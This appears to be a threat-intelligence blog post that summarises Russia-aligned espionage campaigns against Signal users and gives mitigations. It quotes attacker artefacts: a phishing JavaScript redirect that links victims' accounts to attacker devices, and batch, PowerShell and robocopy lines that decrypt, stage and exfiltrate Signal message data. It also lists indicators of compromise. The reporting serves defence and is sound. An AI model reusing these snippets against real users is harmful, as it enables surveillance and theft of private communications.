Overview 

Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia’s intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists. 

The tactics observed in this campaign include phishing attacks abusing Signal’s linked devices feature, malicious JavaScript payloads and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques. 

Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app. 

Tactics Used to Compromise Signal Accounts 

Exploiting Signal’s “Linked Devices” Feature 

Russia-aligned threat actors have manipulated Signal’s legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim’s account, enabling real-time message interception without full device compromise. 

The phishing methods used to deliver these malicious QR codes include: 

• Fake Signal group invites containing altered JavaScript redirects. 
• Phishing pages masquerading as Ukrainian military applications. 
• Spoofed security alerts from Signal urging users to verify their accounts. 
• Captured physical devices on the battlefield, where linked accounts are rerouted to adversary infrastructure for surveillance. 

Threat Actors and Their Techniques 

UNC5792: Manipulated Signal Group Invites 

UNC5792, a Russian-linked espionage cluster with overlaps to CERT-UA’s UAC-0195, has been observed altering legitimate Signal group invites to redirect users to malicious URLs. 

Instead of leading to a genuine group, the phishing page executes a redirect that links the victim’s Signal account to an attacker-controlled instance. 

JavaScript code modifications replace the expected Signal group URI with a device-linking command: 

function doRedirect() { var redirect = ‘sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D’ document.getElementById(‘go-to-group’).href = redirect window.location = redirect} 

The domain infrastructure used for these phishing pages includes: 

• signal-groups[.]tech   
• signal-group[.]site   
• add-signal-groups[.]com   
• signal-security[.]online   

UNC4221: Tailored Signal Phishing Kits 

UNC4221, also known as UAC-0185, has specifically targeted Ukrainian military personnel using custom-built phishing kits that mimic the Kropyva artillery guidance system. 

• Victims receive phishing messages containing fake Signal login pages or malicious QR codes disguised as group invites. 

• The payload collects geolocation data and other device information, using a lightweight JavaScript tool called PINPOINT. 

• Infrastructure linked to UNC4221 includes: 

signal-confirm[.]site   
teneta.add-group[.]site   
signal-protect[.]host   

APT44: WAVESIGN Malware and Android Exploits 

APT44, also known as Sandworm (Seashell Blizzard), has used multiple methods to steal Signal messages, including: 

1. WAVESIGN – a Windows Batch script designed to:  

• Query Signal’s local database. 
• Exfiltrate messages using Rclone, a tool for remote data transfer. 
• Erase logs to evade detection. 

Bat files detected: 

C:\ProgramData\Signal\Storage\sqlcipher.exe %new% “PRAGMA key=””x’%key%'””;” “.recover” > NUL   C:\ProgramData\Signal\Storage\rc.exe copy -P -I –log-file=C:\ProgramData\Signal\Storage\rclog.txt   

2. Chisel Android Malware  

• Designed to recursively search and extract Signal database files from compromised Android devices. 
• Capable of exfiltrating data from multiple secure messaging applications, including WhatsApp and Telegram. 

Turla: PowerShell-Based Signal Data Theft 

Turla, attributed to Russia’s FSB (Center 16), has leveraged PowerShell scripts to exfiltrate Signal messages from compromised Windows desktops. 

• The malware collects and compresses user data before uploading it to a remote server controlled by the attacker. 

Powershell identified: 
Compress-Archive -Path “C:\Users\..\AppData\Roaming\SIGNAL\config.json” -DestinationPath $zipfile   

Copy-Item -Path $zipfile -Destination $resfile -Force   

UNC1151: Robocopy-Based Exfiltration 

UNC1151, a Belarus-aligned espionage group, has been observed using Robocopy to stage Signal message files for later exfiltration. 

robocopy “%userprofile%\AppData\Roaming\Signal” C:\Users\Public\data\signa /S 

Indicators of Compromise (IoCs) 

Domains Hosting Malicious Signal Phishing Pages 

signal-groups[.]tech   
add-signal-groups[.]com   
signal-confirm[.]site   
signal-protect[.]host   
teneta.add-group[.]site   

Malicious JavaScript and Malware Hashes 

e078778b62796bab2d7ab2b04d6b01bf   
a97a28276e4f88134561d938f60db495   
b27ff24870d93d651ee1d8e06276fa98   

IP Addresses Used in Attacks 

150.107.31[.]194:18000   
45.55.158.47   
87.249.138.47   
155.133.4.175   

Mitigation Strategies 

Potential targets of these cyber espionage campaigns can strengthen their defenses with the following measures: 

1. Enable Screen Lock & Strong Passwords 

Use long, complex passwords with mixed characters and symbols. 

2. Update Signal & Other Messaging Apps 

• Install the latest security patches to mitigate known vulnerabilities. 

3. Audit Linked Devices Regularly 

• Navigate to Signal > Linked Devices and remove any unknown connections. 

4. Be Wary of Phishing Links & QR Codes 

• Do not scan QR codes from unverified sources. 
• Avoid clicking on group invites from unknown contacts. 

5. Enable Two-Factor Authentication (2FA) 

• Use biometric authentication, hardware security keys, or one-time codes to prevent unauthorized access. 

6. iPhone Users Should Enable Lockdown Mode 

iOS Lockdown Mode reduces attack surface for high-risk targets. 

Conclusion 

The recent targeting of Signal Messenger by Russia-aligned threat actors represents a significant escalation in cyber espionage efforts. By leveraging phishing campaigns, malware, and post-compromise tactics, adversaries aim to steal sensitive communications from military personnel, journalists, and activists. 

With secure messaging applications becoming high-priority targets, users must adopt proactive security measures to prevent account compromise and data exfiltration. Organizations should also implement threat detection frameworks to identify suspicious account activity and malicious infrastructure linked to these campaigns. 

“The number of cyberattacks is constantly growing, and cyber threats are now a shared challenge for many countries. Therefore, it’s vital to build trusting relationships and create shared platforms for exchanging information about cyber incidents. This allows one country to quickly share data with partners for timely threat response and escalation prevention,”  said Oleksandr Potii, Head of the SSSCIP, at Munich Cyber Security Conference. 

“Cooperation benefits not only us but also our partners. We share our experience and expertise in responding to cyberattacks, while our partners assist us with new technologies. Together, we are building a common ecosystem for protecting cyberspace, countering global cyber threats, and adopting effective strategies for protecting critical infrastructure,” explained Potii. 

As threat actors refine their techniques, Signal, WhatsApp, and Telegram users should remain vigilant, update their applications, and employ best security practices to safeguard their communications against evolving cyber threats. 

References: 

https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger
https://cert.gov.ua/article/6279561
https://cip.gov.ua/en/news/oleksandr-potii-cyber-threats-are-a-shared-challenge-for-many-nationshttps://cip.gov.ua/en/news/experienced-professionals-modern-technologies-and-collaboration-key-components-for-building-robust-cyber-defense
https://thecyberexpress.com/fake-military-apps-targeted-at-ukrainian-army

Related

Disclaimer: This blog is based on our research and the information available at the time of writing. It is for informational purposes only and does not constitute legal, financial, or professional advice. While we strive for accuracy, we do not guarantee the completeness or reliability of the content. If any sensitive information has been inadvertently included, please contact us for correction. Cyble is not responsible for any errors, omissions, or decisions made based on this content. Readers should verify findings and seek expert advice where necessary. All trademarks, logos, and third-party content belong to their respective owners and do not imply endorsement or affiliation. All content is presented “as is” without any guarantee that it is free of confidential, proprietary, or otherwise sensitive information. If you believe any portion of this content contains inadvertently shared or sensitive data, please contact us immediately so that we may address and rectify the issue. No Liability for Errors or Omissions Due to the dynamic nature of cyber threat activity, this [blog/report/article] may include partial, outdated, or otherwise incorrect information due to unverified sources, evolving security threats, or human error. We expressly disclaim any liability for errors or omissions or any potential consequences arising from the use, misuse, or reliance on this information.